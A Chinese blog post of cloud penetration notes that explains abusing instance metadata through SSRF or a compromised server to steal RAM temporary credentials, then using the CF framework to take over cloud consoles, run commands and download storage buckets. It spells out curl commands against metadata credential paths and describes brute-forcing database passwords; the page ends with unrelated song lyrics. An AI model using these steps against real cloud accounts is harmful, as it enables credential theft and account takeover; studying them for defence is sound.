云上攻防-云服务&弹性计算服务器&云数据库&实例元数据&控制角色&AK控制台接管

知识点:
1、云服务-弹性计算服务器-元数据&SSRF&AK
2、云服务-云数据库-外部连接&权限提升
章节点:

云场景攻防:公有云,私有云,混合云,虚拟化集群,云桌面等
云厂商攻防:阿里云,腾讯云,华为云,亚马云,谷歌云,微软云等
云服务攻防:对象存储,云数据库,弹性计算服务器(云服务器),VPC&RAM等
云原生攻防:Docker,Kubernetes(k8s),容器逃逸,CI/CD等

一、演示案例-云服务-弹性计算服务器-元数据&SSRF&AK

元数据解释
实例元数据(metadata)包含了弹性计算云服务器实例在阿里云系统中的信息,您可以在运行中的实例内方便地查看实例元数据,并基于实例元数据配置或管理实例。(基本信息:实例ID、IP地址、网卡MAC地址、操作系统类型等信息。实例标识包括实例标识文档和实例标识签名,所有信息均实时生成,常用于快速辨别实例身份。)

image
各大云元数据地址:

阿里云元数据地址:http://100.100.100.200/
腾讯云元数据地址:http://metadata.tencentyun.com/
华为云元数据地址:http://169.254.169.254/
亚马云元数据地址:http://169.254.169.254/
微软云元数据地址:http://169.254.169.254/
谷歌云元数据地址:http://metadata.google.internal/

细节方面可通过访问官网找元数据访问触发说明

阿里云例子:https://help.aliyun.com/zh/ecs/user-guide/manage-instance-metadata
image

腾讯云例子:https://cloud.tencent.com/document/product/213/4934
image

image


1、前提条件:

弹性计算服务器配置访问控制角色
image
image
image
image
image
image
image
image
image
SSRF漏洞或已取得某云服务器权限(webshell或漏洞rce可以访问触发url)

2、利用环境1:获取某服务器权限后横向移动

image
image

获取关键角色信息

curl http://100.100.100.200/latest/meta-data/
curl http://100.100.100.200/latest/meta-data/ram/security-credentials/

image

获取ecs角色临时凭证

curl http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs

image

利用AK横向移动

CF 云渗透框架项目:https://wiki.teamssix.com/CF/

image
image

1、先配置云服务商的访问密钥

cf config

image
image

2、获取控制台

image
image
image

3、获取所有的ecs服务器image

image
image

4、执行命令(需要先获取ecs服务器)

image

5、获取所有oss存储桶

image
image
image

能看这么多东西是授权的权限高,如果权限低的话能看的东西就很少。

image
image

3、利用环境2:某服务器上Web资产存在SSRF漏洞

image
获取关键角色信息

curl http://100.100.100.200/latest/meta-data/
curl http://100.100.100.200/latest/meta-data/ram/security-credentials/

获取ecs临时凭证

curl http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs

image
利用AK横向移动

CF 云渗透框架项目:https://wiki.teamssix.com/CF/

二、演示案例-云服务-云数据库-外部连接&权限提升

image
image
image
image
image
image
image
image

1、帐号密码
源码配置中找到(几率高)或爆破手段(几率低)
2、连接获取
白名单&外网 直接Navicat支持连接
内网需要其中内网某一个服务器做转发
3、AK利用(权限提升)
CF 云渗透框架项目:https://wiki.teamssix.com/CF/

三、演示案例-云上攻防-如何利用SSRF直接打穿云上内网

1. 利用SSRF发现打点阿里云

这里的 SSRF 漏洞触发点在 UEditor 编辑器的上传图片功能中,下面我们尝试让服务器从 https://baidu.com?.jpg 获取图片。

image
image

2. 直接利用SSRF漏洞获取目标阿里云的元数据地址

image
image
image

3.直接上CF利用框架项目,冲起来image

image

4.存储桶下载后里面翻出另一个AK信息,发现这个 AK 还具有 ECS 的权限。

image
image

5.直接使用 CF拿下一键接管控制台

image
image
image

posted @   愿得一人欣  阅读(31)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 一个费力不讨好的项目,让我损失了近一半的绩效!
· 清华大学推出第四讲使用 DeepSeek + DeepResearch 让科研像聊天一样简单!
· 实操Deepseek接入个人知识库
· CSnakes vs Python.NET:高效嵌入与灵活互通的跨语言方案对比
· Plotly.NET 一个为 .NET 打造的强大开源交互式图表库
  1. 1 イエスタデイ(翻自 Official髭男dism) 茶泡饭,春茶,kobasolo
  2. 2 世间美好与你环环相扣 柏松
世间美好与你环环相扣 - 柏松
00:00 / 00:00
An audio error has occurred, player will skip forward in 2 seconds.

作词 : 尹初七

作曲 : 柏松

编曲 : 彭圣杰

偏偏秉烛夜游

偏偏秉烛夜游

午夜星辰 似奔走之友

爱你每个结痂伤口

酿成的陈年烈酒

入喉尚算可口

入喉尚算可口

怎么泪水 还偶尔失守

邀你细看心中缺口

裂缝中留存 温柔

此时已莺飞草长 爱的人正在路上

此时已莺飞草长 爱的人正在路上

我知他风雨兼程 途经日暮不赏

穿越人海 只为与你相拥

此刻已皓月当空 爱的人手捧星光

我知他乘风破浪 去了黑暗一趟

感同身受 给你救赎热望

知道你不能 还要你感受

知道你不能 还要你感受

让星光加了一点彩虹

让樱花偷偷 吻你额头

让世间美好 与你环环相扣

此时已莺飞草长 爱的人正在路上

此时已莺飞草长 爱的人正在路上

我知他风雨兼程 途经日暮不赏

穿越人海 只为与你相拥

此刻已皓月当空 爱的人手捧星光

我知他乘风破浪 去了黑暗一趟

感同身受 给你救赎热望

此时已莺飞草长 爱的人正在路上

此时已莺飞草长 爱的人正在路上

我知他风雨兼程 途经日暮不赏

穿越人海 只为与你相拥

此刻已皓月当空 爱的人手捧星光

我知他乘风破浪 去了黑暗一趟

感同身受 给你救赎热望

知道你不能 还要你感受

知道你不能 还要你感受

让星光加了一点彩虹

当樱花开的纷纷扬扬

当世间美好 与你环环相扣

特别鸣谢:槿葵,我们的海报制作妹妹。

原唱:柏松

吉他:柏松

和声:柏松

录音:柏松

混音:张强

点击右上角即可分享
微信分享提示